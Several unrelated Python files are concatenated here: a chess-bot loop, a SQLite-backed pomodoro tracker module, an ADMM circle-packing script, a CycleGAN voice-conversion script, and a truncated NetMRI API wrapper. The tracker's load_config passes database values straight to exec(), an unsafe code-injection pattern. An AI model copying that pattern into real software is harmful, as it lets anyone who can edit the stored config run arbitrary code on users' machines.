for rank in pos.board:
for square in rank:
sum += whose_man(square, pos.color) * piece_value(square)
return sum
# optimization results will go here:
TUNED_WEIGHTS = {}
def score_threats(pos):
return 0
def score_position(pos):
return 0
def score(pos):
return 1 * score_material(pos) + 1 * score_threats(pos) + 1 * score_position(pos)
# Auto-generated code below aims at helping you parse
# the standard input according to the problem statement.
constants_count = int(input())
for i in range(constants_count):
name, value = input().split()
# print("name=%s, value=%s" % (name, value), file=sys.stderr, flush=True)
print("fen")
# game loop
while True:
COPY_COUNTER = 0
inputs = input().split()
start_time = time.time_ns()
pos = Position.from_fen(inputs[0], inputs[1])
# use 'moves' and 'lastmove' perhaps?
# the following input fields are unimportant
castling = inputs[2]
en_passant = inputs[3]
half_move_clock = int(inputs[4])
full_move = int(inputs[5])
all_moves = gen_all_moves(pos)
print(list(map(move_to_algebraic, all_moves)), file=sys.stderr, flush=True)
best = minimax(pos, -1000, 1000, 2)
print(best, file=sys.stderr, flush=True)
#print("score: %0.2f" % score_material(pos), file=sys.stderr, flush=True)
if full_move == 1:
print(move_to_algebraic(first_move(pos)))
elif best.optimal_move is None:
print("random")
else:
print(move_to_algebraic(best.optimal_move))
print("copies made: %d" % COPY_COUNTER, file=sys.stderr, flush=True)
print("time used: %d microsecs" % ((time.time_ns() - start_time) / (10**3)), file=sys.stderr, flush=True)
|
import sqlite3 as sql
import cumodoro.config as config
from cumodoro.error import DatabaseError
from collections import deque
import datetime
import sys
import logging
log = logging.getLogger('cumodoro')
class Task():
pass
class Database():
def __init__(self):
self.db = None
self.cursor = None
self.tasks = None
self.full_task_list = {}
self.task_list = {}
self.task_chain = {None:[]}
self.has_savepoint = False
def connect(self):
if self.db == None:
try:
self.db = sql.connect(config.DATABASE, detect_types=sql.PARSE_DECLTYPES|sql.PARSE_COLNAMES, check_same_thread=False)
self.db.isolation_level = None
self.cursor = self.db.cursor()
self.has_savepoint = False
except sql.Error as e:
print("Error:",e)
sys.exit(1)
def disconnect(self):
if self.db != None:
try:
self.db.close()
self.db = None
self.cursor = None
except sql.Error as e:
print("Error:",e)
sys.exit(1)
def commit(self):
try:
if self.has_savepoint:
raise DatabaseError("Savepoint not released")
self.db.commit()
except sql.Error as e:
print("Error:",e)
sys.exit(1)
def execute(self,query,params = None,immediate=True):
if self.db == None:
self.connect()
if isinstance(query,str) and ( params == None or isinstance(params,tuple) ):
if isinstance(params,tuple):
self.cursor.execute(query,params)
else:
self.cursor.execute(query)
if immediate:
self.commit()
else:
raise DatabaseError("parameter missmatch: string != "+str(type(query)))
def request(self,query,params = None):
if self.db == None:
self.connect()
self.execute(query,params)
result = self.cursor.fetchall()
return result
def create(self):
self.connect()
try:
self.cursor.execute("""
CREATE TABLE IF NOT EXISTS tasks (
id INTEGER PRIMARY KEY,
desc TEXT NOT NULL,
color INTEGER DEFAULT 0,
active INTEGER DEFAULT 1,
task INTEGER,
note TEXT
)""")
self.cursor.execute("""
CREATE TABLE IF NOT EXISTS pomodoros (
id INTEGER PRIMARY KEY,
time TIMESTAMP NOT NULL,
duration INTEGER NOT NULL,
task INTEGER
)""")
self.cursor.execute("""
CREATE TABLE IF NOT EXISTS config (
variable TEXT PRIMARY KEY NOT NULL,
value TEXT
)""")
if False:
# remove these:
self.cursor.execute("DELETE FROM tasks")
self.cursor.execute("INSERT OR IGNORE INTO tasks (id,desc) VALUES (1,'Education')")
self.cursor.execute("INSERT OR IGNORE INTO tasks (id,desc) VALUES (2,'Research')")
self.cursor.execute("INSERT OR IGNORE INTO tasks (id,desc) VALUES (3,'Learning')")
self.cursor.execute("INSERT OR IGNORE INTO tasks (id,desc) VALUES (4,'Personal')")
self.cursor.execute("INSERT OR IGNORE INTO tasks (id,desc) VALUES (5,'Config')")
self.cursor.execute("INSERT OR IGNORE INTO tasks (id,desc) VALUES (6,'Project')")
self.cursor.execute("INSERT OR IGNORE INTO tasks (id,desc) VALUES (20,'Reading')")
self.cursor.execute("INSERT OR IGNORE INTO tasks (id,task,color,desc) VALUES (7 ,1,1,'<NAME>')")
self.cursor.execute("INSERT OR IGNORE INTO tasks (id,task,color,desc) VALUES (8 ,2,9,'RUDIN')")
self.cursor.execute("INSERT OR IGNORE INTO tasks (id,task,color,desc) VALUES (9 ,4,2,'Cumodoro')")
self.cursor.execute("INSERT OR IGNORE INTO tasks (id,task,color,desc) VALUES (10,4,4,'Cookbook')")
self.cursor.execute("INSERT OR IGNORE INTO tasks (id,task,color,desc) VALUES (11,5,5,'Vim')")
self.cursor.execute("INSERT OR IGNORE INTO tasks (id,task,color,desc) VALUES (12,6,11,'MoSCHA')")
self.cursor.execute("INSERT OR IGNORE INTO tasks (id,task,color,desc) VALUES (30,20,5,'Reading Club')")
self.cursor.execute("INSERT OR IGNORE INTO tasks (id,task,color,desc) VALUES (31,20,18,'Research')")
self.cursor.execute("INSERT OR IGNORE INTO tasks (id,task,color,desc) VALUES (13,8,6,'Paper')")
self.cursor.execute("INSERT OR IGNORE INTO tasks (id,task,color,desc) VALUES (14,8,3,'Source')")
self.cursor.execute("INSERT OR IGNORE INTO tasks (id,task,color,desc) VALUES (40,31,202,'Model Counting')")
try:
self.cursor.execute("INSERT OR IGNORE INTO config (variable,value) VALUES (?,?)",('TIME_SLOT',str(config.TIME_SLOT)))
self.cursor.execute("INSERT OR IGNORE INTO config (variable,value) VALUES (?,?)",('TIME_SLOT_NAME',str(config.TIME_SLOT_NAME)))
self.cursor.execute("INSERT OR IGNORE INTO config (variable,value) VALUES (?,?)",('TIME_POMODORO',str(config.TIME_POMODORO)))
self.cursor.execute("INSERT OR IGNORE INTO config (variable,value) VALUES (?,?)",('TIME_BREAK',str(config.TIME_BREAK)))
except: pass
self.db.commit()
except sql.Error as e:
print("Query Error on creation:",e)
sys.exit(1)
def update_config(self,variable,value):
self.execute("UPDATE config SET value = ? WHERE variable == ?",(str(value),variable))
def savepoint(self):
if not self.has_savepoint:
self.cursor.execute("savepoint cumodoro")
self.has_savepoint = True
else:
raise DatabaseError("Savepoint already present")
def rollback(self):
if self.has_savepoint:
self.cursor.execute("rollback to savepoint cumodoro")
else:
raise DatabaseError("Cannot rollback: savepoint doesn't exist")
def release(self):
if self.has_savepoint:
self.cursor.execute("release savepoint cumodoro")
self.has_savepoint = False
else:
raise DatabaseError("Cannot release: savepoint doesn't exist")
def load_config(self):
configlist = self.request("SELECT variable,value FROM config")
if configlist != None:
for variable,value in configlist:
try:
exec("config."+str(variable)+" = "+str(value))
except:
exec("config."+str(variable)+" = '"+str(value)+"'")
else:
log.debug("No config loaded from database")
config.init()
def load_tasks(self):
if self.tasks != None:
del self.tasks
del self.colors
self.full_task_list = {}
self.task_list = {}
self.tasks = {}
t = Task()
t.idx = None
t.task = None
t.color = 0
t.active = 1
t.desc = "None"
self.tasks[t.idx] = t
raw_tasks = self.request("SELECT id,task,color,active,desc FROM tasks")
for entry in raw_tasks:
idx, task, color, active, desc = entry
t = Task()
t.idx = idx
t.task = task
t.color = color
t.active = active
t.desc = desc
self.tasks[idx] = t
if idx not in self.task_list:
self.task_list[idx] = []
if task not in self.task_list:
self.task_list[task] = []
self.task_list[task].append(idx)
self.full_task_list = dict(self.task_list)
self.colors = {None:[0]}
self.levels = 0
if None in self.task_list:
q = deque([[1,None,x] for x in self.task_list[None]])
while q:
level,parent,idx = q.popleft()
if self.tasks[idx].active > 0:
q.extend([[level+1,idx,x] for x in self.task_list[idx]])
if idx not in self.colors:
self.colors.update({idx:[]})
color_list = []
if parent in self.colors:
color_list.extend(self.colors[parent])
self.colors[idx].extend(color_list)
self.colors[idx].append(self.tasks[idx].color)
if self.levels <= level:
self.levels = level + 1
else:
q2 = deque([[idx,x] for x in self.task_list[idx]])
del self.task_list[parent][self.task_list[parent].index(idx)]
while q2:
level2,parent2,idx2 = q2.popleft()
q2.extend([[level2+1,idx2,x] for x in self.task_list[idx2]])
del self.task_list[idx2]
for idx,color_list in self.colors.items():
length = len(color_list)
if length < self.levels:
if length > 0:
self.colors[idx].extend([color_list[-1] for i in range(self.levels - length)])
else:
self.colors[idx].extend([0 for i in range(self.levels - length)])
self.task_chain = {None:[]}
for task in self.tasks.keys():
self.task_chain.update({task:self.find_task(task)})
def find_task_rec(self,idx,l):
for i in range(0,len(l)):
if l[i] == idx:
return [(l[i],i)]
if l[i] in self.task_list:
rl = self.find_task_rec(idx,self.task_list[l[i]])
if len(rl) > 0:
rl.insert(0,(l[i],i))
return rl
return []
def find_task(self,idx):
if None not in self.task_list:
return []
else:
rl = self.find_task_rec(idx,self.task_list[None])
return rl
def get_pomodoros(self):
pass
def sync(self,T):
pass
def delete_task_rec(self,tl):
for i in range(len(tl)):
t = tl[i]
self.delete_task_rec(self.task_list[t])
log.debug("delete task "+str(t)+": "+str(self.task_list[t]))
self.cursor.execute("DELETE FROM tasks WHERE id = ?",(t,))
self.cursor.execute("UPDATE pomodoros SET task = ? WHERE task = ?",(None,t))
def delete_task(self,idx,immediate = False):
self.connect()
self.delete_task_rec([idx])
if immediate:
self.db.commit()
def store_task(self,e):
if e.idx == None:
data = (e.desc, e.color, e.active, e.task)
self.execute("INSERT INTO tasks (desc,color,active,task) VALUES (?,?,?,?)",data)
e.idx = self.cursor.lastrowid
else:
data = (e.desc, e.color, e.active, e.task, e.idx)
self.execute("UPDATE tasks SET desc = ?, color = ?, active = ?, task = ? WHERE id = ?", data)
def alter_pomodoro_task(self,idx,task,time=None,immediate=False):
if idx == None:
self.execute("INSERT INTO pomodoros (time,duration,task) VALUES (?,?,?)", (time,config.TIME_POMODORO_SEC,task), immediate)
else:
self.execute("UPDATE pomodoros SET task = ? WHERE id == ?",(task,idx),immediate)
def delete_pomodoro(self,idx,immediate=False):
if idx != None:
self.execute("DELETE FROM pomodoros WHERE id = ?", (idx,), immediate)
def add_pomodoro_now(self,task):
if task == None:
self.execute("INSERT INTO pomodoros (time,duration) VALUES (?,?)",(datetime.datetime.now(),config.TIME_POMODORO_SEC))
else:
data = (datetime.datetime.now(),config.TIME_POMODORO_SEC,task)
self.execute("INSERT INTO pomodoros (time,duration,task) VALUES (?,?,?)",data)
|
# Circle packing in unit square using ADMM
# minimize \sum_{i,j} f_{ij}(z_i, z_j) + \sum_i g_i(z_i)
# f_{ij}(z_i, z_j) = 0, if ||z_i - z_j|| >= 2R
# = infinity, if ||z_i - z_j|| < 2R
# g_i(z_i) = 0, if R <= z_i <= 1 - R
# = infinity, otherwise
import numpy as np
import itertools
import matplotlib.pyplot as plt
import multiprocessing as mp
def get_ind(n):
holder = itertools.combinations(range(n), 2)
ind_map = {}
i = 0
for p in holder:
ind_map[i] = p
i += 1
return ind_map
# x_overlap = proximal operator of f
# x_box = proximal operator of g = projection of n_box on to a box
def prox_op(x_overlap, x_box, n_overlap, n_box, ind_map, R, n, N):
# Compute x_overlap:
for a, value in ind_map.items():
i = value[0]
j = value[1]
if np.linalg.norm(n_overlap[a][i] - n_overlap[a][j]) >= 2 * R:
x_overlap[a][i] = n_overlap[a][i]
x_overlap[a][j] = n_overlap[a][j]
else:
# Pull them apart equally:
diff = n_overlap[a][i] - n_overlap[a][j]
d = np.linalg.norm(diff)
diff_unit = diff / d
x_overlap[a][i] = n_overlap[a][i] + (R - d / 2) * diff_unit
x_overlap[a][j] = n_overlap[a][j] - (R - d / 2) * diff_unit
# Compute x_box:
for i in range(n):
for k in range(2):
if n_box[i][k] < R:
x_box[i][k] = R
elif n_box[i][k] > 1 - R:
x_box[i][k] = 1 - R
else:
x_box[i][k] = n_box[i][k]
return x_overlap, x_box, n_overlap, n_box
def admm_rest_steps(x_overlap, x_box, m_overlap, m_box, z, u_overlap, u_box, n_overlap, n_box, n, ind_map, N, alpha):
# Update m:
m_overlap = x_overlap + u_overlap
m_box = x_box + u_box
# Update z:
m_accum = np.zeros((n, 2))
# Get m_overlap:
for key, value in ind_map.items():
i = value[0]
j = value[1]
m_accum[i] += m_overlap[key][i]
m_accum[j] += m_overlap[key][j]
# Get m_box:
m_accum += m_box
# Average:
z = m_accum / n
# Update u and n:
u_overlap += (alpha * (x_overlap - z))
n_overlap = z - u_overlap
u_box += (alpha * (x_box - z))
n_box = z - u_box
return x_overlap, x_box, m_overlap, m_box, z, u_overlap, u_box, n_overlap, n_box
def circle_packing_admm(R, n, max_iter, alpha):
ind_map = get_ind(n)
N = len(ind_map)
x_overlap = np.zeros((N, n, 2))
x_box = np.zeros((n, 2))
m_overlap = np.zeros((N, n, 2))
m_box = np.zeros((n, 2))
z = np.zeros((n, 2))
u_overlap = np.zeros((N, n, 2))
u_box = np.zeros((n, 2))
n_overlap = np.random.rand(N, n, 2)
n_box = np.zeros((n, 2))
for i in range(max_iter):
x_overlap, x_box, n_overlap, n_box = prox_op(x_overlap, x_box, n_overlap, n_box, ind_map, R, n, N)
x_overlap, x_box, m_overlap, m_box, z, u_overlap, u_box, n_overlap, n_box = admm_rest_steps(x_overlap, x_box, m_overlap, m_box, z, u_overlap, u_box, n_overlap, n_box, n, ind_map, N, alpha)
return z
if __name__ == '__main__':
R = 0.125 # Radius
n = 16 # Number of circles
max_iter = 2000
alpha = 0.005
z = circle_packing_admm(R, n, max_iter, alpha)
print(z)
# Draw circles:
for p in z:
circle= plt.Circle((p[0], p[1]), radius=R)
ax = plt.gca()
ax.add_patch(circle)
# Draw unit box:
box = plt.Rectangle((0, 0), 1, 1, fill=False)
plt.gca().add_patch(box)
plt.axis('scaled') # Make sure picutre is not deformed
plt.show()
|
<reponame>chikiuso/vc2
import os
import glob
from models.cyclegan_vc2 import CycleGAN2
from speech_tools import *
dataset = 'vcc2018'
src_speaker = 'azure_val'
trg_speaker = 'xi_val'
model_name = 'cyclegan_vc2'
data_dir = os.path.join('datasets', dataset)
exp_dir = os.path.join('experiments', dataset)
eval_A_dir = os.path.join(data_dir, 'vcc2018_evaluation', src_speaker)
eval_B_dir = os.path.join(data_dir, 'vcc2018_reference', trg_speaker)
exp_A_dir = os.path.join(exp_dir, src_speaker)
exp_B_dir = os.path.join(exp_dir, trg_speaker)
validation_A_output_dir = os.path.join('experiments', dataset, model_name,
'converted_{}_to_{}'.format(src_speaker, trg_speaker))
validation_B_output_dir = os.path.join('experiments', dataset, model_name,
'converted_{}_to_{}'.format(trg_speaker, src_speaker))
os.makedirs(validation_A_output_dir, exist_ok=True)
os.makedirs(validation_B_output_dir, exist_ok=True)
sampling_rate = 22050
num_mcep = 36
frame_period = 5.0
n_frames = 128
print('Loading cached data...')
coded_sps_A_norm, coded_sps_A_mean, coded_sps_A_std, log_f0s_mean_A, log_f0s_std_A = load_pickle(
os.path.join(exp_A_dir, 'cache{}.p'.format(num_mcep)))
coded_sps_B_norm, coded_sps_B_mean, coded_sps_B_std, log_f0s_mean_B, log_f0s_std_B = load_pickle(
os.path.join(exp_B_dir, 'cache{}.p'.format(num_mcep)))
model = CycleGAN2(num_features=num_mcep, batch_size=1, mode='test')
model.load(
filepath=os.path.join('experiments', dataset, model_name, 'checkpoints', '{}_200000.ckpt'.format(model_name)))
print('Generating Validation Data B from A...')
for file in glob.glob(eval_A_dir + '/*.wav'):
wav, _ = librosa.load(file, sr=sampling_rate, mono=True)
wav = wav_padding(wav=wav, sr=sampling_rate, frame_period=frame_period, multiple=4)
f0, timeaxis, sp, ap = world_decompose(wav=wav, fs=sampling_rate, frame_period=frame_period)
f0_converted = pitch_conversion(f0=f0, mean_log_src=log_f0s_mean_A, std_log_src=log_f0s_std_A,
mean_log_target=log_f0s_mean_B, std_log_target=log_f0s_std_B)
coded_sp = world_encode_spectral_envelop(sp=sp, fs=sampling_rate, dim=num_mcep)
coded_sp_transposed = coded_sp.T
coded_sp_norm = (coded_sp_transposed - coded_sps_A_mean) / coded_sps_A_std
coded_sp_converted_norm = model.test(inputs=np.array([coded_sp_norm]), direction='A2B')[0]
if coded_sp_converted_norm.shape[1] > len(f0):
coded_sp_converted_norm = coded_sp_converted_norm[:, :-1]
coded_sp_converted = coded_sp_converted_norm * coded_sps_B_std + coded_sps_B_mean
coded_sp_converted = coded_sp_converted.T
coded_sp_converted = np.ascontiguousarray(coded_sp_converted)
decoded_sp_converted = world_decode_spectral_envelop(coded_sp=coded_sp_converted, fs=sampling_rate)
wav_transformed = world_speech_synthesis(f0=f0_converted, decoded_sp=decoded_sp_converted, ap=ap, fs=sampling_rate,
frame_period=frame_period)
librosa.output.write_wav(os.path.join(validation_A_output_dir, os.path.basename(file)), wav_transformed,
sampling_rate)
print('Generating Validation Data A from B...')
for file in glob.glob(eval_B_dir + '/*.wav'):
wav, _ = librosa.load(file, sr=sampling_rate, mono=True)
wav = wav_padding(wav=wav, sr=sampling_rate, frame_period=frame_period, multiple=4)
f0, timeaxis, sp, ap = world_decompose(wav=wav, fs=sampling_rate, frame_period=frame_period)
f0_converted = pitch_conversion(f0=f0, mean_log_src=log_f0s_mean_B, std_log_src=log_f0s_std_B,
mean_log_target=log_f0s_mean_A, std_log_target=log_f0s_std_A)
coded_sp = world_encode_spectral_envelop(sp=sp, fs=sampling_rate, dim=num_mcep)
coded_sp_transposed = coded_sp.T
coded_sp_norm = (coded_sp_transposed - coded_sps_B_mean) / coded_sps_B_std
coded_sp_converted_norm = model.test(inputs=np.array([coded_sp_norm]), direction='B2A')[0]
if coded_sp_converted_norm.shape[1] > len(f0):
coded_sp_converted_norm = coded_sp_converted_norm[:, :-1]
coded_sp_converted = coded_sp_converted_norm * coded_sps_A_std + coded_sps_A_mean
coded_sp_converted = coded_sp_converted.T
coded_sp_converted = np.ascontiguousarray(coded_sp_converted)
decoded_sp_converted = world_decode_spectral_envelop(coded_sp=coded_sp_converted, fs=sampling_rate)
wav_transformed = world_speech_synthesis(f0=f0_converted, decoded_sp=decoded_sp_converted, ap=ap, fs=sampling_rate,
frame_period=frame_period)
librosa.output.write_wav(os.path.join(validation_B_output_dir, os.path.basename(file)), wav_transformed,
sampling_rate)
|
<gh_stars>0
from ..broker import Broker
class NeighborBroker(Broker):
controller = "neighbors"
def show(self, **kwargs):
"""Shows the details for the specified neighbor.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param NeighborID: The internal NetMRI identifier for this neighbor relationship.
:type NeighborID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of neighbor methods. The listed methods will be called on each neighbor returned and included in the output. Available methods are: network_id, device, interface, neighbor_device, neighbor_interface, infradevice.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: device, interface, neighbor_device, neighbor_interface.
:type include: Array of String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return neighbor: The neighbor identified by the specified NeighborID.
:rtype neighbor: Neighbor
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
def index(self, **kwargs):
"""Lists the available neighbors. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the source device in this neighbor relationship.
:type DeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the source device in this neighbor relationship.
:type DeviceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the source interface in this neighbor relationship.
:type InterfaceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the source interface in this neighbor relationship.
:type InterfaceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param NeighborDeviceID: The internal NetMRI identifier for the destination device in this neighbor relationship.
:type NeighborDeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NeighborDeviceID: The internal NetMRI identifier for the destination device in this neighbor relationship.
:type NeighborDeviceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param NeighborID: The internal NetMRI identifier for this neighbor relationship.
:type NeighborID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NeighborID: The internal NetMRI identifier for this neighbor relationship.
:type NeighborID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param NeighborInterfaceID: The internal NetMRI identifier for the destination interface in this neighbor relationship.
:type NeighborInterfaceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NeighborInterfaceID: The internal NetMRI identifier for the destination interface in this neighbor relationship.
:type NeighborInterfaceID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the neighbors as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of neighbor methods. The listed methods will be called on each neighbor returned and included in the output. Available methods are: network_id, device, interface, neighbor_device, neighbor_interface, infradevice.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: device, interface, neighbor_device, neighbor_interface.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` NeighborID
:param sort: The data field(s) to use for sorting the output. Default is NeighborID. Valid values are DataSourceID, NeighborID, DeviceID, InterfaceID, ifIndex, NeighborDeviceID, NeighborInterfaceID, NeighborIfIndex, NeighborFirstSeenTime, NeighborStartTime, NeighborEndTime, NeighborChangedCols, NeighborTimestamp, CombinedInd, CDPInd, LLDPInd, SerialInd, SwitchFwdInd, RevSwitchFwdInd, DirectEthernetInd, IPRoutedInd, StaticRoutedInd, LocalRoutedInd, ProtoRoutedInd, BGPRoutedInd, OSPFRoutedInd, IGRPRoutedInd, NetworkDeviceInd, NeighborNetworkDeviceInd, CDPNeighborID, LLDPNeighborID.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each Neighbor. Valid values are DataSourceID, NeighborID, DeviceID, InterfaceID, ifIndex, NeighborDeviceID, NeighborInterfaceID, NeighborIfIndex, NeighborFirstSeenTime, NeighborStartTime, NeighborEndTime, NeighborChangedCols, NeighborTimestamp, CombinedInd, CDPInd, LLDPInd, SerialInd, SwitchFwdInd, RevSwitchFwdInd, DirectEthernetInd, IPRoutedInd, StaticRoutedInd, LocalRoutedInd, ProtoRoutedInd, BGPRoutedInd, OSPFRoutedInd, IGRPRoutedInd, NetworkDeviceInd, NeighborNetworkDeviceInd, CDPNeighborID, LLDPNeighborID. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return neighbors: An array of the Neighbor objects that match the specified input criteria.
:rtype neighbors: Array of Neighbor
"""
return self.api_list_request(self._get_method_fullname("index"), kwargs)
def search(self, **kwargs):
"""Lists the available neighbors matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param BGPRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon a BGP route.
:type BGPRoutedInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param BGPRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon a BGP route.
:type BGPRoutedInd: Array of Boolean
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param CDPInd: A flag indicating that this neighbor relationship was derived based upon the source device's CDP entries.
:type CDPInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param CDPInd: A flag indicating that this neighbor relationship was derived based upon the source device's CDP entries.
:type CDPInd: Array of Boolean
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param CDPNeighborID: The internal NetMRI identifier for the CdpNeighbor object associated with this neighbor entry (if any).
:type CDPNeighborID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param CDPNeighborID: The internal NetMRI identifier for the CdpNeighbor object associated with this neighbor entry (if any).
:type CDPNeighborID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param CombinedInd: A flag indicating that these devices have basic layer 1/2 connectivity.
:type CombinedInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param CombinedInd: A flag indicating that these devices have basic layer 1/2 connectivity.
:type CombinedInd: Array of Boolean
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the source device in this neighbor relationship.
:type DeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the source device in this neighbor relationship.
:type DeviceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DirectEthernetInd: A flag indicating that this neighbor relationship was derived using the NetMRI direct Ethernet neighbor detection algorithm (for example, two routers directly connected via Ethernet, without any switches between them).
:type DirectEthernetInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DirectEthernetInd: A flag indicating that this neighbor relationship was derived using the NetMRI direct Ethernet neighbor detection algorithm (for example, two routers directly connected via Ethernet, without any switches between them).
:type DirectEthernetInd: Array of Boolean
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param IGRPRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon an IGRP or EIGRP route.
:type IGRPRoutedInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IGRPRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship based upon an IGRP or EIGRP route.
:type IGRPRoutedInd: Array of Boolean
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param IPRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship; that is, the destination device is a next hop for at least one route on the source device.
:type IPRoutedInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IPRoutedInd: A flag indicating that this neighbor relationship represents an IP routing relationship; that is, the destination device is a next hop for at least one route on the source device.
:type IPRoutedInd: Array of Boolean
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the source interface in this neighbor relationship.
:type InterfaceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the source interface in this neighbor relationship.
:type InterfaceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param LLDPInd: A flag indicating that this neighbor relationship was derived based upon the source device's LLDP entries.
:type LLDPInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
